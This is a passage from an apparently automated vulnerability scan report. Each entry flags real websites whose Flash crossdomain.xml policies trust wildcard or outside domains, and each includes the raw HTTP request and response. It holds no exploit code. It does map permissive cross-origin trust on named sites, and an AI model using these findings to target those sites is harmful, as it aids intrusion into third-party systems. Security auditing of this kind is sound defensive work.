Host:   http://www.kens5.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.kens5.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Sun, 01 May 2011 06:47:11 GMT
X-Server-Name: sj-c14-r8-u22-b5
Content-Type: text/xml;charset=utf-8
Date: Mon, 02 May 2011 00:08:50 GMT
Content-Length: 7031
Connection: close
Set-Cookie: click_mobile=0
X-N: S

<?xml version="1.0" encoding="UTF-8" ?>
<cross-domain-policy>
<allow-access-from domain="*.bimtv3.bimedia.net"/>
<allow-access-from domain="*.bimtv.bimedia.net"/>
<allow-access-from domain="*.bimedia.net"/>
<allow-access-from domain="*.younewstv.com"/>
<allow-access-from domain="*.broadcast-interactive.com"/>
<allow-access-from domain="*.media.broadcast-interactive.com"/>
<allow-access-from domain="*.bimedia.net"/>
<allow-access-from domain="*alpha.bimedia.net"/>
<allow-access-from domain="*echo.bimedia.net"/>
<allow-access-from domain="*echo2.bimedia.net"/>
<allow-access-from domain="*content.bimedia.net"/>
<allow-access-from domain="*alpha.bimedia.net"/>
<allow-access-from domain="*content.bimedia.net"/>
<allow-access-from domain="*.2news.tv"/>
<allow-access-from domain="*.aksuperstation.com"/>
<allow-access-from domain="*.belo.com"/>
<allow-access-from domain="*.centralillinoisnewscenter.com"/>
<allow-access-from domain="*.cbs3springfield.com"/>
<allow-access-from domain="*.explorepolitics.com"/>
<allow-access-from domain="*.granitetv.com"/>
<allow-access-from domain="*.indianasnewscenter.com"/>
<allow-access-from domain="*.katu.com"/>
<allow-access-from domain="*.kcby.com"/>
<allow-access-from domain="*.kcrg.com"/>
<allow-access-from domain="*.kens5.com"/>
<allow-access-from domain="*.keprtv.com"/>
<allow-access-from domain="*.keyt.com"/>
<allow-access-from domain="*.kfbb.com"/>
<allow-access-from domain="*.kgw.com"/>
<allow-access-from domain="*.khou.com"/>
<allow-access-from domain="*.kidk.com"/>
<allow-access-from domain="*.kimatv.com"/>
<allow-access-from domain="*.king5.com"/>
<allow-access-from domain="*.klewtv.com"/>
<allow-access-from domain="*.kmov.com"/>
<allow-access-from domain="*.knin.com"/>
<allow-access-from domain="*.komonews.com"/>
<allow-access-from domain="*.kpic.com"/>
<allow-access-from domain="*.krem.com"/>
<allow-access-from domain="*.ksee24.com"/>
<allow-access-from domain="*.ksbitv.com"/>
<allow-access-from domain="*.ktnv.com"/>
<allow-access-from domain="*.ktvb.com"/>
<allow-access-from domain="*.clickability.com"/>
<allow-access-from domain="*.kval.com"/>
<allow-access-from domain="*.kvi.com"/>
<allow-access-from domain="*.kvue.com"/>
<allow-access-from domain="*.kulr8.com"/>
<allow-access-from domain="*.northlandsnewscenter.com"/>
<allow-access-from domain="*.nwcn.com"/>
<allow-access-from domain="*.star1015.com"/>
<allow-access-from domain="*.tv20detroit.com"/>
<allow-access-from domain="*.wbng.com"/>
<allow-access-from domain="*.wcnc.com"/>
<allow-access-from domain="*.wdtv.com"/>
<allow-access-from domain="*.whas11.com"/>
<allow-access-from domain="*.wkbw.com"/>
<allow-access-from domain="*.wwltv.com"/>
<allow-access-from domain="*.wltz.com"/>
<allow-access-from domain="*.wnky.net"/>
<allow-access-from domain="*.wfaa.com"/>
<allow-access-from domain="*.wvec.com"/>
<allow-access-from domain="*.abc6.com"/>
<allow-access-from domain="*.wktv.com"/>
<allow-access-from domain="*.wgbctv.com"/>
<allow-access-from domain="*.wmdntv.com"/>
<allow-access-from domain="*.kjzz.com"/>
<allow-access-from domain="*.abcmontana.com"/>
<allow-access-from domain="*.wncftv.com"/>
<allow-access-from domain="*.ugclocal.com"/>
<allow-access-from domain="*.kmvt.com"/>
<allow-access-from domain="*.cnn.com"/>
<allow-access-from domain="*.bakersfieldnow.com"/>
<allow-access-from domain="*.wmdntv.com"/>
<allow-access-from domain="*.wgbctv.com"/>
<allow-access-from domain="*.nbcuxd.com"/>
<allow-access-from domain="*.bakersfieldnow.com"/>
<allow-access-from domain="*.indiancountrytoday.com"/>
<allow-access-from domain="*.indiancountry.com"/>
<allow-access-from domain="*.pro8news.com"/>
<allow-access-from domain="*.oneidaindiannation.com"/>
<allow-access-from domain="*.oneidanation.net"/>
<allow-access-from domain="*.kofytv.com"/>
<allow-access-from domain="*.wrdetv.com"/>
<allow-access-from domain="*.lively-nation.com"/>
<allow-access-from domain="*.ucdailynews.com"/>
<allow-access-from domain="*.wjys.tv"/>
<allow-access-from domain="*.wavenewspapers.com"/>
<allow-access-from domain="*.wwnytv.com"/>
<allow-access-from domain="*.laindependent.com"/>
<allow-access-from domain="*.fox24.com"/>
<allow-access-from domain="*.cachevalleydaily.com"/>
<allow-access-from domain="bim.images.vidavee.com"/>
<allow-access-from domain="*.king5.com"/>
<allow-access-from domain="*.sharinghope.tv"/>
<allow-access-from domain="*.azfamily.com"/>
<allow-access-from domain="*.wpsdlocal6.com"/>
<allow-access-from domain="*.bimvid.com"/>
<allow-access-from domain="*.fox11az.com"/>
<allow-access-from domain="*.kissfmnews.com"/>
<allow-access-from domain="*.mychristiantv.net"/>
<allow-access-from domain="*.cheeseheadtalk.com"/>
<allow-access-from domain="*.myfoxmaine.com"/>
<allow-access-from domain="*.foxcharlotte.com"/>
<allow-access-from domain="*.wfrv.com"/>
<allow-access-from domain="*.wfxb.com"/>
<allow-access-from domain="*.newscentralga.com"/>
<allow-access-from domain="*.worcestermag.com"/>
<allow-access-from domain="*.khastv.com"/>
<allow-access-from domain="*.krextv.com"/>
<allow-access-from domain="*.bimlocal.com"/>
<allow-access-from domain="*.foxillinois.com"/>
<allow-access-from domain="*.thetobagonews.com"/>
<allow-access-from domain="*.trinidadexpress.com"/>
<allow-access-from domain="*.reachcaribbean.com"/>
<allow-access-from domain="*.klassicgrenada.com"/>
<allow-access-from domain="*.sixpointtt.com"/>
<allow-access-from domain="*.trinivoices.com"/>
<allow-access-from domain="*.fox50.com"/>
<allow-access-from domain="*.youralaskalink.com"/>
<allow-access-from domain="*.thehomeforinnovation.com"/>
<allow-access-from domain="*.classicrock102.net"/>
<allow-access-from domain="test.library.contentexchange.titantv.com"/>
<allow-access-from domain="*.titantv.com"/>
<allow-access-from domain="*.decisionmark.com"/>
<allow-access-from domain="*.newstalkkcrs.com"/>
<allow-access-from domain="*.1033kissfm.net"/>
<allow-access-from domain="*.mymix1067.com"/>
<allow-access-from domain="*.mycountry961.com"/>
<allow-access-from domain="*.myironmanstory.com"/>
<allow-access-from domain="*.kcwx.com"/>
<allow-access-from domain="*.ncwtv.com"/>
<allow-access-from domain="*.wktctv.com"/>
<allow-access-from domain="*.krbkhd.com"/>
<allow-access-from domain="*.ktva.com"/>
<allow-access-from domain="*.baystateparent.com"/>
<allow-access-from domain="*.itsyourbiz.com"/>
<allow-access-from domain="*.accuweather.com"/>
<allow-access-from domain="*.kmvt-1.com"/>
<allow-access-from domain="*.wbbjtv.com"/>
<allow-access-from domain="*.abccolumbia.com"/>
<allow-access-from domain="*.ntwinecx.com"/>
<allow-access-from domain="*.ntwineapp.com"/>
<allow-access-from domain="*.sbtv.com"/>
<allow-access-from domain="*.allbusiness.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.hoovers.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.dnb.com" secure="false"/>
...[SNIP]...

8.99. http://www.lavalife.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.lavalife.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.lavalife.com

Response

HTTP/1.0 200 OK
Date: Sun, 17 Apr 2011 01:22:08 GMT
Server: Apache/2.0.63 (Unix)
Last-Modified: Wed, 10 Nov 2010 14:25:51 GMT
ETag: "3036422-a6-494b3a25e79c0"
Accept-Ranges: bytes
Content-Length: 166
Content-Type: application/xml
Age: 155936
X-Cache: HIT from www.lavalife.com
Connection: close

<?xml version='1.0'?>
<cross-domain-policy>
   <allow-access-from domain="*.omnidate.net" />
   <allow-access-from domain="*.omnidate.com" />
</cross-domain-policy>

8.100. http://www.lduhtrp.net/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.lduhtrp.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.lduhtrp.net

Response

HTTP/1.0 200 OK
Server: Resin/3.1.8
Content-Type: text/xml
Date: Mon, 02 May 2011 02:18:25 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
<allow-access-from domain="www.supersavvyme.com" />
<allow-access-from domain="*.intuit.com" />
<allow-access-from domain="www.dim.fr" />
<allow-access-from domain="*.dim-privileges.com" />
<allow-access-from domain="*.konbini.com" />
<allow-access-from domain="*.loomisdev.com" />
<allow-access-from domain="*.loomisgroup.com" />
...[SNIP]...

8.101. http://www.mihomepaper.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.mihomepaper.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.mihomepaper.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:38:15 GMT
Server: Apache
Last-Modified: Mon, 09 Aug 2010 15:28:11 GMT
ETag: "1300000017dd54-7f-48d65aa12bbc7"
Accept-Ranges: bytes
Content-Length: 127
Vary: Accept-Encoding
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<cross-domain-policy>
   <allow-access-from domain="*.mytiwi.com" to-ports="*" />
</cross-domain-policy>

8.102. http://www.mynews.in/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.mynews.in
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.mynews.in

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:58:56 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 mod_fcgid/2.3.5
Last-Modified: Sun, 03 Oct 2010 11:14:13 GMT
ETag: "2de48fa-d3-491b48710ab40"
Accept-Ranges: bytes
Content-Length: 211
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.cooliris.com" />
</cross-dom
...[SNIP]...

8.103. http://www.nextworth.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.nextworth.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.nextworth.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:18:01 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 03 Jun 2010 17:32:49 GMT
ETag: "14a8008-84-4882398679240"
Accept-Ranges: bytes
Content-Length: 132
Connection: close
Content-Type: text/xml
Set-Cookie: nx123=APACHE1; path=/
Cache-control: private

<?xml version="1.0"?>
<cross-domain-policy>
   <allow-access-from domain="*.atlanticfundadministration.com" />
</cross-domain-policy>

8.104. http://www.swarminteractive.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.swarminteractive.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.swarminteractive.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:16:42 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7a mod_bwlimited/1.4 mod_perl/2.0.4 Perl/v5.8.8
Last-Modified: Wed, 24 Feb 2010 15:19:24 GMT
ETag: "5a04be-151-4805a30fad700"
Accept-Ranges: bytes
Content-Length: 337
Connection: close
Content-Type: application/xml

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy> <allow-access-from domain="www.swarminteractive.com
...[SNIP]...
<allow-access-from domain="swarminteractive.com" /> <allow-access-from domain="*.swarminteractive.com" />
...[SNIP]...

8.105. http://www.toyotacertified.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.toyotacertified.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.toyotacertified.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 23 Feb 2011 17:50:54 GMT
ETag: "5f628-505-bd05bb80"
Accept-Ranges: bytes
Content-Length: 1285
Content-Type: application/xml
X-N: S
Date: Sun, 01 May 2011 23:38:34 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.toyota.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.toyotacertified.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.toyotacertificados.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="motifcdn.doubleclick.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="m.doubleclick.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="m2.doubleclick.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="m3.doubleclick.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="m.2mdn.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="m2.2mdn.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="betadfa.doubleclick.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="dfa.doubleclick.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="motifcdn2.doubleclick.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="ad.doubleclick.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="m1.2mdn.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.doubleclick.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.2mdn.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="mediaweb.jrbassoc.com" secure="false"/>
...[SNIP]...

8.106. http://www.tqlkg.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tqlkg.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.tqlkg.com

Response

HTTP/1.0 200 OK
Server: Resin/3.1.8
Content-Type: text/xml
Date: Mon, 02 May 2011 02:19:12 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
<allow-access-from domain="www.supersavvyme.com" />
<allow-access-from domain="*.intuit.com" />
<allow-access-from domain="www.dim.fr" />
<allow-access-from domain="*.dim-privileges.com" />
<allow-access-from domain="*.konbini.com" />
<allow-access-from domain="*.loomisdev.com" />
<allow-access-from domain="*.loomisgroup.com" />
...[SNIP]...

8.107. http://www.villagehatshop.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.villagehatshop.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.villagehatshop.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:26:46 GMT
Server: Apache
Last-Modified: Thu, 19 Feb 2009 19:38:03 GMT
Accept-Ranges: bytes
Content-Length: 321
Cache-Control: max-age=0
Expires: Sun, 01 May 2011 23:26:46 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="www.villagehatshop.com" />
<allow-access-from domain="villagehatshop.com" />
<allow-access-from domain="*.villagehatshop.com" />
...[SNIP]...

8.108. http://www.washingtonpost.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.washingtonpost.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.washingtonpost.com

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sun, 06 Feb 2011 23:42:57 GMT
Content-Type: application/xml
Content-Length: 478
X-Cnection: close
Cache-Control: must-revalidate, max-age=584
Date: Sun, 01 May 2011 23:32:53 GMT
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.washingtonpost.com"/>
<allow-access-from domain="admin.brightcove.com"/>
<allow-access-from domain="*.newsweek.com"/>
<allow-access-from domain="*.digitalink.com"/>
<allow-access-from domain="*.slate.com"/>
<allow-access-from domain="livingstories.googlelabs.com"/>
...[SNIP]...

8.109. http://www.whymilk.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.whymilk.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.whymilk.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:35:52 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 18 Mar 2010 21:08:57 GMT
ETag: "15181c4-409-48219a393ac40"
Accept-Ranges: bytes
Content-Length: 1033
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="promotions.bodybymilk.com"/>
   <allow-access-from domain="promotions.whymilk.com"/>
   <allow-access-from domain="bodybymilk.com"/>
   <allow-access-from domain="www.bodybymilk.com"/>
   <allow-access-from domain="whymilk.com"/>
...[SNIP]...
<allow-access-from domain="dev.bodybymilk.com"/>
   <allow-access-from domain="*.draftfcb.net"/>
   <allow-access-from domain="speed.pointroll.com"/>
   <allow-access-from domain="data.pointroll.com"/>
   <allow-access-from domain="media.pointroll.com"/>
   <allow-access-from domain="mirror.pointroll.com"/>
   <allow-access-from domain="pointroll.com"/>
   <allow-access-from domain="www.pointroll.com"/>
   <allow-access-from domain="facebook.com"/>
   <allow-access-from domain="*.facebook.com"/>
   <allow-access-from domain="*.eligeleche.com"/>
...[SNIP]...

8.110. http://www.wpsdlocal6.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.wpsdlocal6.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.wpsdlocal6.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Sat, 30 Apr 2011 17:03:23 GMT
X-Server-Name: dv-c1-r2-u7-b6
Content-Type: text/xml;charset=utf-8
Date: Sun, 01 May 2011 23:11:27 GMT
Content-Length: 7031
Connection: close
Set-Cookie: click_mobile=0

<?xml version="1.0" encoding="UTF-8" ?>
<cross-domain-policy>
<allow-access-from domain="*.bimtv3.bimedia.net"/>
<allow-access-from domain="*.bimtv.bimedia.net"/>
<allow-access-from domain="*.bimedia.net"/>
<allow-access-from domain="*.younewstv.com"/>
<allow-access-from domain="*.broadcast-interactive.com"/>
<allow-access-from domain="*.media.broadcast-interactive.com"/>
<allow-access-from domain="*.bimedia.net"/>
<allow-access-from domain="*alpha.bimedia.net"/>
<allow-access-from domain="*echo.bimedia.net"/>
<allow-access-from domain="*echo2.bimedia.net"/>
<allow-access-from domain="*content.bimedia.net"/>
<allow-access-from domain="*alpha.bimedia.net"/>
<allow-access-from domain="*content.bimedia.net"/>
<allow-access-from domain="*.2news.tv"/>
<allow-access-from domain="*.aksuperstation.com"/>
<allow-access-from domain="*.belo.com"/>
<allow-access-from domain="*.centralillinoisnewscenter.com"/>
<allow-access-from domain="*.cbs3springfield.com"/>
<allow-access-from domain="*.explorepolitics.com"/>
<allow-access-from domain="*.granitetv.com"/>
<allow-access-from domain="*.indianasnewscenter.com"/>
<allow-access-from domain="*.katu.com"/>
<allow-access-from domain="*.kcby.com"/>
<allow-access-from domain="*.kcrg.com"/>
<allow-access-from domain="*.kens5.com"/>
<allow-access-from domain="*.keprtv.com"/>
<allow-access-from domain="*.keyt.com"/>
<allow-access-from domain="*.kfbb.com"/>
<allow-access-from domain="*.kgw.com"/>
<allow-access-from domain="*.khou.com"/>
<allow-access-from domain="*.kidk.com"/>
<allow-access-from domain="*.kimatv.com"/>
<allow-access-from domain="*.king5.com"/>
<allow-access-from domain="*.klewtv.com"/>
<allow-access-from domain="*.kmov.com"/>
<allow-access-from domain="*.knin.com"/>
<allow-access-from domain="*.komonews.com"/>
<allow-access-from domain="*.kpic.com"/>
<allow-access-from domain="*.krem.com"/>
<allow-access-from domain="*.ksee24.com"/>
<allow-access-from domain="*.ksbitv.com"/>
<allow-access-from domain="*.ktnv.com"/>
<allow-access-from domain="*.ktvb.com"/>
<allow-access-from domain="*.clickability.com"/>
<allow-access-from domain="*.kval.com"/>
<allow-access-from domain="*.kvi.com"/>
<allow-access-from domain="*.kvue.com"/>
<allow-access-from domain="*.kulr8.com"/>
<allow-access-from domain="*.northlandsnewscenter.com"/>
<allow-access-from domain="*.nwcn.com"/>
<allow-access-from domain="*.star1015.com"/>
<allow-access-from domain="*.tv20detroit.com"/>
<allow-access-from domain="*.wbng.com"/>
<allow-access-from domain="*.wcnc.com"/>
<allow-access-from domain="*.wdtv.com"/>
<allow-access-from domain="*.whas11.com"/>
<allow-access-from domain="*.wkbw.com"/>
<allow-access-from domain="*.wwltv.com"/>
<allow-access-from domain="*.wltz.com"/>
<allow-access-from domain="*.wnky.net"/>
<allow-access-from domain="*.wfaa.com"/>
<allow-access-from domain="*.wvec.com"/>
<allow-access-from domain="*.abc6.com"/>
<allow-access-from domain="*.wktv.com"/>
<allow-access-from domain="*.wgbctv.com"/>
<allow-access-from domain="*.wmdntv.com"/>
<allow-access-from domain="*.kjzz.com"/>
<allow-access-from domain="*.abcmontana.com"/>
<allow-access-from domain="*.wncftv.com"/>
<allow-access-from domain="*.ugclocal.com"/>
<allow-access-from domain="*.kmvt.com"/>
<allow-access-from domain="*.cnn.com"/>
<allow-access-from domain="*.bakersfieldnow.com"/>
<allow-access-from domain="*.wmdntv.com"/>
<allow-access-from domain="*.wgbctv.com"/>
<allow-access-from domain="*.nbcuxd.com"/>
<allow-access-from domain="*.bakersfieldnow.com"/>
<allow-access-from domain="*.indiancountrytoday.com"/>
<allow-access-from domain="*.indiancountry.com"/>
<allow-access-from domain="*.pro8news.com"/>
<allow-access-from domain="*.oneidaindiannation.com"/>
<allow-access-from domain="*.oneidanation.net"/>
<allow-access-from domain="*.kofytv.com"/>
<allow-access-from domain="*.wrdetv.com"/>
<allow-access-from domain="*.lively-nation.com"/>
<allow-access-from domain="*.ucdailynews.com"/>
<allow-access-from domain="*.wjys.tv"/>
<allow-access-from domain="*.wavenewspapers.com"/>
<allow-access-from domain="*.wwnytv.com"/>
<allow-access-from domain="*.laindependent.com"/>
<allow-access-from domain="*.fox24.com"/>
<allow-access-from domain="*.cachevalleydaily.com"/>
<allow-access-from domain="bim.images.vidavee.com"/>
<allow-access-from domain="*.king5.com"/>
<allow-access-from domain="*.sharinghope.tv"/>
<allow-access-from domain="*.azfamily.com"/>
<allow-access-from domain="*.wpsdlocal6.com"/>
<allow-access-from domain="*.bimvid.com"/>
<allow-access-from domain="*.fox11az.com"/>
<allow-access-from domain="*.kissfmnews.com"/>
<allow-access-from domain="*.mychristiantv.net"/>
<allow-access-from domain="*.cheeseheadtalk.com"/>
<allow-access-from domain="*.myfoxmaine.com"/>
<allow-access-from domain="*.foxcharlotte.com"/>
<allow-access-from domain="*.wfrv.com"/>
<allow-access-from domain="*.wfxb.com"/>
<allow-access-from domain="*.newscentralga.com"/>
<allow-access-from domain="*.worcestermag.com"/>
<allow-access-from domain="*.khastv.com"/>
<allow-access-from domain="*.krextv.com"/>
<allow-access-from domain="*.bimlocal.com"/>
<allow-access-from domain="*.foxillinois.com"/>
<allow-access-from domain="*.thetobagonews.com"/>
<allow-access-from domain="*.trinidadexpress.com"/>
<allow-access-from domain="*.reachcaribbean.com"/>
<allow-access-from domain="*.klassicgrenada.com"/>
<allow-access-from domain="*.sixpointtt.com"/>
<allow-access-from domain="*.trinivoices.com"/>
<allow-access-from domain="*.fox50.com"/>
<allow-access-from domain="*.youralaskalink.com"/>
<allow-access-from domain="*.thehomeforinnovation.com"/>
<allow-access-from domain="*.classicrock102.net"/>
<allow-access-from domain="test.library.contentexchange.titantv.com"/>
<allow-access-from domain="*.titantv.com"/>
<allow-access-from domain="*.decisionmark.com"/>
<allow-access-from domain="*.newstalkkcrs.com"/>
<allow-access-from domain="*.1033kissfm.net"/>
<allow-access-from domain="*.mymix1067.com"/>
<allow-access-from domain="*.mycountry961.com"/>
